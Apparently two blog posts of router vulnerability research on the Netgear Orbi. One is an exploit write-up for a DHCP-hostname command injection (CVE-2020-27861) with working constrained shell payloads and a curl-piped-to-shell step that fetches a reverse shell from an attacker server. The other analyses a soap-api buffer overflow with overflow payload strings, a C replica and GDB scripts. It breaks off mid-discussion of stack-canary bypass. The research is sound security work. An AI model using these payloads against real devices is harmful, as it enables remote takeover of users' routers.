I created the following GDB script to set breakpoints on main() and system() when I attached to UA_Parser , as well as set the fork-mode settings to be sure the debugger follows the processes as they spawn.

set breakpoint pending on
set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break system
commands 2
info args
backtrace full
info frame
info registers
x/s $r0
x/s $r1
x/s $r2
continue
end

net-scan runs periodically in the background on the device but a re-scan can also be manually triggered by loading the “Attached Devices” page in the web admin UI. This is what I used during testing to force it to run the vulnerable code. Interestingly, I later discovered it would run even with unauthenticated requests to the homepage, so an attacker would actually be able to trigger the vulnerable code on-demand.

Below is a screenshot of the GDB script breaking on system() while attached to the UA_Parser process and triggering the vulnerable code. The argument that was passed to system() can be seen near the bottom of the register listing (the call to ‘devices_info update …’).

payload delivery

In order to send custom DHCP hostname values easily and establish DHCP connections, I used udcpc, which allows for passing in a custom hostname at the command line. I used this command after connecting to the Orbi using a static IP and confirmed the payload appeared in the relevant files.

sudo ./udhcpc -H "\$PATH" -f -i  -n

With everything set up to be able to deliver payloads, it was time to start building one.

crafting payloads

using parameter+substring expansion to build a payload

As mentioned earlier in this post, each character in the hostname value that udhcpd receives from clients is uppercased before it’s saved to the global leases array and eventually written to /tmp/dhcpd_hostlist. This means that by the time UA_Parser reads these value from /tmp/netscan/attach_device, a payload like $(reboot) would be transformed to $(REBOOT). Linux and native Linux file systems are case-sensitive, which means any such payload would fail to execute the desired program. So, I needed to find a way to call binaries using only uppercase letters, alphanumeric symbols, and numbers.

My first thought was I would likely need to use shell expansion and environment variables since they typically use uppercase names. I did a bit of Googling and came across this page about bash parameter expansion, which seemed like a viable way to construct a working payload. Specifically, I thought substring expansion could be used slice up pieces of environment variables to grab the characters needed to build a payload. With this in mind, I checked what environment variables were available in the shell for root (the UA_Parser process runs as root) and quickly realized I would have to get pretty creative given what was was there.

I played around with different patterns in the shell while connected via serial and eventually found one that made use of both parameter and filepath expansion which would expand out to /sbin/reboot built up from characters sliced from the $PATH env variable

${PATH:4:5}/${PATH:3:1}?????

In this context, the ? symbol is used to match up to a single character — the expansion works because reboot is the only binary in /sbin that starts with r followed by 5 characters. The screenshot below shows the final payload constructed piece by piece.

The final step was to place this payload within a shell context using command substitution so that once the string expanded out it would be interpreted as a command. To do this I wrapped the payload inside $() syntax and set everything up to do a test run. After getting a DHCP lease with the crafted request and attaching to the running UA_Parser process, I loaded the Attached Devices page in the web UI and caused net-scan to run. Easy peasy, right?

Yeah, right. It’s never that easy.

more constraints: html encoding

The screenshow below shows the debugger output when catching the vulnerable call to system() with the payload above.

This is when I discovered there was some filtering happening and certain characters are HTML encoded. Specifically, the parentheses characters are encoded in the payload above. I went back through code for net-scan and found the function responsible for the encoding — the full list of encoded characters are:

< > ( ) & ' " \

I also learned that net-scan truncates the hostname string read from the DHCP host list at 32 characters before writing it to /tmp/netscan/attach_device.

Pretty rough! Almost every useful character (in regards to shell manipulation) is encoded and there’s a pretty tight length limit, which only makes writing a functional exploit that much more difficult. But, first I had to get code execution, so I pushed on.

success: backquote command substitution

There was really only one other option left to get to get command execution considering parenthese were filtered and that was the use the older backquote form of substitution:

`${PATH:4:5}/${PATH:3:1}?????`

I did the usual dance to connect and send a DHCP request while attached to the UA_Parser process with GDB. After triggering net-scan again, I caught the call to system() and saw that a new chain of calls had occurred and reboot had been called. The device then began to reboot!

And there it is, a working proof-of-concept showing the bug could be exploited…

escaping constraints: arbitrary code execution

Okay, but rebooting the device isn’t particularly cool. Now it was time to think about what could actually be done with the bug.

To recap, the contraints for the payload are:

32 character length limit
All letters get uppercased
Filters chars: < > ( ) & ' " \
must build payload from chars in env variables + file/parameter expansion:
- PATH=/usr/sbin:/usr/bin:/sbin:/bin
- HOME=/tmp
- HOSTNAME=RBR20

The length limit was probably the most frustrating part of this whole thing when combined with the uppercasing issue — it could easily take 7-9 characters to do the expansion needed to grab a single character for the final payload, so using up those 32 characters was very easy. The inability to use > or < also meant using redirection to overwrite files wasn’t an option.

With all of this in mind, I narrowed down the possible attack scenarios to the following:

Leak admin credentials back to the attacker somehow
Reset the admin password
Download and execute a script to run arbitrary commands without dealing with constraints

I spent a couple of days experimenting with what felt like hundreds of payloads and possible angles to achieve one of the results above. Again, that length limit SUCKED — on multiple occasions I had figured out working payloads that ended up exceeding the limit by 1-2 characters and immediately became useless. At the end of each session I would tell myself I would give up and that it just wasn’t possible to do anything useful given the restrictions. Then the next day when I signed back on I would get sucked back in, convinced there just had to be a way.

going after curl

After tons of failed attempts, I eventually came to a conclusion: in order to do anything useful, I would need to find a way to break out of / get around the length limit. Having determined this, I knew the only feasible way forward would be to find a way to download a script from a remote source and run it, which would avoid the uppercasing issues, length limits, etc. With this in mind, I shifted my focus to figuring out a way to use the curl or wget binaries on the router to achieve this.

This finally paid off after another couple of hacking sessions when I figured out the following payload:

The first part makes use of expansion to match /usr/bin/curl, which is used to make a request to a server (hy.me in this example), and pipes the contents of the response to a shell (pointed to by $0).

In order to test this and show it working without having to actually go out and buy a two character domain (which apparently go for anywhere between $500 - $15k), I edited /etc/hosts on the device to add a record pointing hy.me to my ‘evil’ server where I was running a Python web server that would respond with the contents of a shell script to requests for the root path (to use as few characters as possible).

The screenshot below shows everything in action, going counter-clockwise starting at the top-left:

the udhcpc process that sent the payload
the code for the Python webapp that returns code to spawn a reverse shell
the running webapp showing requests were received from the Orbi
(open telnet session, unrelated)
the netcat listener receiving the connection from reverse shell

conclusion

There it is: there’s now an exploit for CVE-2020-27861 and it can be used to completely take over a vulnerable Orbi device. In total, it took about a week to go from starting to initial analysis to finally getting arbitrary code execution, with most of the time being spent on figuring out how to create a payload to actually do something useful given the restrictions. It was pretty fun and I was able to pick up some new techniques for dealing with payload constraints for command execution.

The most important lesson learned? Persistence pays off (usually). I really didn’t think a full exploit would be possible and almost gave up before getting full system control, but I’m glad I kept pushing. I’ll probably start spending more time doing this kind of n-day research and monitoring advisories for specific devices/applications to hopefully be able to do this for a more recent vuln.

Resources

orbi hunting 0x1: crashes in soap-api

2022-06-19T00:00:00+00:00

The second part in this series going over my time hunting for bugs on the netgear orbi. This post is a walkthrough of a long journey that began with the discovery of a buffer overflow which I initially though was unreachable due to a separate null pointer dereference and eventually finding a way to get past that null deref — only to ultimately be thwarted by a stack canary that couldn’t be easily bypassed (at least, not by me). So, free 0day for anyone that can exploit it? Hit me up on twitter to let me know how you did it.

introduction

The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http:///soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every requests I sent to this endpoing caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.

Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.

background

The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it onto soap-api. The server sets environment variables that describe the request, which soap-api then reads from in order to handle it.

The format of the SOAPAction header is:



crash discovery

While doing some manual testing after starting with a known-good SOAPAction header value, I found that server would send the following response when submitting a METHOD_str part that is 248 characters or longer while simultaneously causing a crash dump to be printed to the console .

HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT








SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : []    lr : []    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[] (unwind_backtrace) from [] (show_stack+0x10/0x14)
[] (show_stack) from [] (dump_stack+0x78/0x98)
[] (dump_stack) from [] (__do_user_fault+0x74/0xbc)
[] (__do_user_fault) from [] (do_page_fault+0x2f0/0x370)
[] (do_page_fault) from [] (do_DataAbort+0x34/0x98)
[] (do_DataAbort) from [] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff


Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone as the stack trace only shows the top of the call stack containing chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra and find where the SOAPACtion header was being  parsed and trace it through the application, looking for places where it could overflow a buffer.

first find: buffer overflow in SendSoapResponse()

After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output i was getting from the server, I found the following piece of code at function  0x0003e82c.   From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.



The overflow occurs on line 48 in the decompiled code shown above as a result of the call to  sscanf(). This line parses the SOAP method section from the server response content  () and writes it to the buffer auStack236 , which is a 64-byte static buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.


After reading through the code some more I realized almost every request eventually led to  SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:


  main()
    
      takes care of getting the SOAPAction header from an environment variable SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
      handles parsing of the SOAP action and SOAP method parts from the header
      saves pointers to the start of each section in the buffer/PTR returned by getenv()
      these ptrs are passed to SoapExecute()
    
  
  SoapExecute()
    
      The main function that actually does handling of the various SOAP actions and methods
      Handles authentication checks
      Calls appropriate functions/etc based on submitted actions / method
      at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
    
  
  SendSoapRespCode()
    
      Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
      The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
    
  
  SendSoapResponse()
    
      Here the final response content is finalized and sent to the client
    
  


live debugging

At this point I felt pretty confident I was crashing soap-api from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api , I would have to debug on the baremetal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.

For each request that accesses SOAP functionality,  lighttpd forks and (something) eventually executes soap-api to handle this request. I initially had some trouble getting the debugger to catch when soap-api was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.

These were:


  create break on main()
  set follow-fork-mode child
  continue
  after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
  set follow-fork-mode parent (to prevent new forks from taking over)
  continue


This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on sscanf() and to catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.

set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue


lolwut: a null dereference

With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:



This output seemed to indicate that:


  The crash was happening in strcmp in libc.so.1
  The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0 , which is 0 at the time of the crash


deep dive: SendSoapResponse()

At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the bug. I tried different payload lengths and values to see if it caused anything other than a null pointer defer but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.

how the payload reaches SendSoapResponse()

The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:

  char resp[512];
  char *resp_fmt = "\"urn:NETGEAR-ROUTER:service:%s:1\">\r\n%03d\r\n";
  snprintf(resp_b, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);


Assuming a method “METHOD”, action “ACTION, and response code 404, the resulting string would be:

 xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1">
404


snprintf() will read 512 bytes at most, but that can occur in the first format string it inserts if it’s long enough, resulting in no further formatting and the rest of the string being truncated. For example, submitting a method string containing 500 A’s results in the following string:




code breakdown

The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.

Ghidra decompiler output:

/*1*/      if (is_soap_login == 1) {
/*2*/        local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/       fprintf(stream,
/*4*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/                ,total_content_len,local_jwt_ptr);
/*6*/      }
/*7*/      else {
/*8*/        fprintf(stream,
/*9*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/                ,total_content_len);
/*11*/      }
/*12*/      soap_log(2,
/*13*/               "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nSe rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/               ,total_content_len);
/*15*/      fputs(s_xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/      fputs(resp,stream);
/*17*/      fputs(s__
/*18*/      soap_log(0,"%s%s%s",s_1.0"_encoding="UT_000bd624,resp,
/*19*/               s_SOAP-ENV:Body>_SOAP-ENV:Enve_000bd6fc);
/*20*/      fflush(stream);

/*21*/      if ((ext_mode == 0) &&
/*22*/         (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/                        /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/                            */
/*25*/        sscanf(resp,",method_response_buf);
/*26*/        strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/        if (strstr_Response_ret != (char *)0x0) {
/*28*/          *strstr_Response_ret = '\0';
/*29*/        }
/*30*/                        /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/        sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"");
/*34*/        if (ptr_to_substrings_found != (char *)0x0) {
/*35*/          sscanf(ptr_to_substrings_found,"%[^<]",&local_114);
/*36*/        }
/*37*/        vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/        execve_wrapper_maybe
/*39*/                  ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/                   combined_action_method_str,&local_114,0);
/*41*/        FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/      }



  Arguments:
    
      FILE *stream: filestream where response will be written (socket back to client?)
      char *resp: a 512 byte buffer containing the body of the XML SOAP response contructed by the calling function (DoSoapRespCode)
    
  
  Lines 1-20 in the snippet handle constructing and send the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
    
      note: this is why the response is always sent no matter
    
  
  Line 25: a call to sscanf to attempt to parse the SOAP method string
    
      other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
      sscanf searches for the pattern  and will parse the content between the colon up to the end of ‘Response’

      method_response_buf is a static 64 byte buffer
      its possible to overflow this buffer if the string between  and Response* is greater than 64 bytes, which appears to be possible to do

    

  

  Line 26: a call to a strstr wrapper to check for the presence of the string “Response ” in the data that was read into method_response_buf by  sscanf
    
      this wrapper first checks to make sure neither of the two arguments passed to it are NULL
        
          if either of them are, it doesn’t call strstr and just returns a NULL pointer
          if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
        
      
      If the submitted SOAP method has pushed Response string entirely off of the XML buffer that is constructed, this would return NULL
    
  
  Line 27-29: if the call to strstr did NOT return NULL (the Response string was found), set the value at the first char of Response to NULL
    
      This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated
    
  
  Line 31: another call to strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string  "service:"
    
      there is no check after this to see if this returned NULL
    
  
  Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:" , this time using the value returned by the call to strstr on the previous line as it’s source
    
      since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
      this only happens when the method string was sufficiently long to have pushed "service:*:" string off of the XML body buffer resp
    
  
  Line 33: third call to strstr wrapper, this time searching for the string "" in resp otherwise this is skipped
  Line 34: if the string was found by the call to strstr in the previous line, sscanf is used to parse out a substring similar to previous calls; otherwise this is just skipped.


takeaways

After going through the code, I knew the following:


  It is possible to overflow method_response_buf that the first call to sscanf() writes the method string to.
  It is possible to overflow service_action_buf that the second call to sscanf() writes the action string to.
  A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
    
      This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp
    
  


Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:' string to be truncated from the end of resp, causing the strstr() call which checks for it to return a null pointer that is then passed to sscanf() without checking if it was null first.

(failed) exploit attempt #1

The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:


  the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
  the final contents of resp must include the string 'service:' ]


With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null defererence but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for to service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and had was pretty exhausted so I just called it at that point and concluded that the even though the buffer overflow was there, it was ‘unreachble’ due to the (incorrect) contstraints I had in mind at the time. Honestly, I was just relieved to be done with it.

exploit viability, revisited

As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the contstraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity but basically I had an incorrect understanding of the constraints and the behavior of sscanf() . Anyway, I updated my mental model of the bug.

With a new understanding of the constraints , I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL deference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.

From the GPL archive (soap-api is part of the net-cgi package):

./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector


local testing

In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.

int replica (FILE *stream, char *resp) {
	// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
	int content_len;
	char* jwt;
	char *var2;
	char *var3;
	char *var4;
	char method_buf[64];
	char action_buf[32];
	char combined_action_method[128];
	char *undef1;
	char *undef2;
	int stack_check_val;

	printf("resp: %s\n", resp);

	// fake stack canary
	stack_check_val = 0x313373;
	printf("[+] stack check start: 0x%x\n", stack_check_val);

	// null the buffers
	memset(method_buf, 0, 64);
	memset(action_buf, 0, 32);
	memset(combined_action_method, 0, 128);

	// call sscanf - 1: parse the Method portion from the xml blob in resp
	// and save it to method buf (format is '
	// here if the parsed string is greater than 64 bytes
	printf("[+] sscanf call 1: parse method portion from resp\n");
	sscanf(resp, ", method_buf);

	// this would check to confirm that the expected pattern/str was parsed (should still
	// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
	// fail this check.
	var2 = strstr(method_buf, "Response");
	// but it doesn't really matter because it's only to see if
	if (var2 != (char *)0x0) {
		printf("[+] found 'Response' in method_buf, NULLED\n");
		*var2 = 0x0;
	}

	// ========= Second call to sscanf() and NULL check fail ===========
	// search for service string in resp, no NULL check
	// a long enough METHOD would result in this being truncated, causing strstr
	// to return a NULL pointer
	printf("[+] strstr call 1: check for 'service:' in resp\n");
	var3 = (char *)strstr(resp, "service:");
	// DEBUG -- show when we fail this check
	if (var3 == (char *)0x0) {
		printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
		printf("resp: %s\n", resp);
	}
	printf("[+] sscanf call 2: parse ACTION portion from resp\n");
	sscanf(var3, "service:%[^:]", action_buf);

	// check for  in resp
	printf("[+] strstr call 2: check for '' in resp\n");
	var3 = (char *)strstr(resp, "");
	if (var3 != (char *)0x0) {
		// if its there, parse some stuff from it (not important right now)
		printf("[+] found , passed check\n");
		undef1 = 0;
	}

	// check if the stack check int was overwritten
	printf("[+] stack check end: 0x%x\n", stack_check_val);
	return 0;
}

int main(int argc, char *argv[]) {
	// args to pass to target func (replicating original)
	FILE *streams = 0;

	// this will hold the payload (i.e. the Method portion we would submit)
	// read from env to make testing easier
	char *payload = getenv("PAYLOAD");
	printf("[+] payload length: %d\n", strlen(payload));

	// construct the response content the same way the server does in SendSoapRespCode()
	char resp_b[512];
	memset(resp_b, 0, 512);
  // this is the fmt string the calling function uses to construct resp
	char *resp_fmt = "\"urn:NETGEAR-ROUTER:service:%s:1\">\r\n%03d\r\n";
	snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);

	// call the target function with the payload
	printf("[+] calling target function...\n\n");
	replica(streams, resp_b);
	return 0;
}


I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with payload one would assume would definitely pass the string check:

-> % ./replica2
[+] payload length: 130
[+] calling target function...

resp: ="urn:NETGEAR-ROUTER:service:ConfigSync:1">
404

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1]    221258 segmentation fault (core dumped)  ./replica2


After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:

-> % ./replica2
[+] payload length: 2450
[+] calling target function...

resp: [+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '' in resp
[+] stack check end: 0x63697672
[1]    221814 segmentation fault (core dumped)  ./replica2


Nice!

now, against the device

With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"


I modified the GDB script I had been using to break on __stack_chk_fail() instead of  sscanf() to confirm and saw this in the output:



Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.

I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"


Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 <__stack_chk_fail>
cpsr           0x80000010	-2147483632
0x0:	
0xb6f01b65:	""
0x42424242:	
0x5719b01e:	


stack canary bypass, question mark?

So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.

a primer on SSP

The Stack Smashing Protector (SSP) is a compiler feature specifically design to detect stack-based buffer overflows and abort the program if one is detected to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame — this means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.

For GCC’s -fstack-protector, for example:


  This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.



It’s important to note one thing: this protection does not prevent overflows from happening — it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function when the canary is check could be affected by the effects of the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering of variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increasing the likelyhood of overflows overwriting the canary value.

Another important point is that the canary value is set at runtime, so it remains the same for the entire lifetime of the application, as well as if the application forks. New processes started via the shell or execve() will have unique canaries.

I took a look at arch/arm/include/asm/stackprotector.h in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that for canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE on ARM architectures:

static __always_inline void boot_init_stack_canary(void)
{
	unsigned long canary;

	/* Try to get a semi random initial value. */
	get_random_bytes(&canary, sizeof(canary));
	canary ^= LINUX_VERSION_CODE;

	current->stack_canary = canary;
	__stack_chk_guard = current->stack_canary;
}


bruteforcing? I guess…not

Generally speaking, there are two ways of going about bypassing the canary check:


  Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
  Bruteforce the canary byte-by-byte (only works under certain conditions)


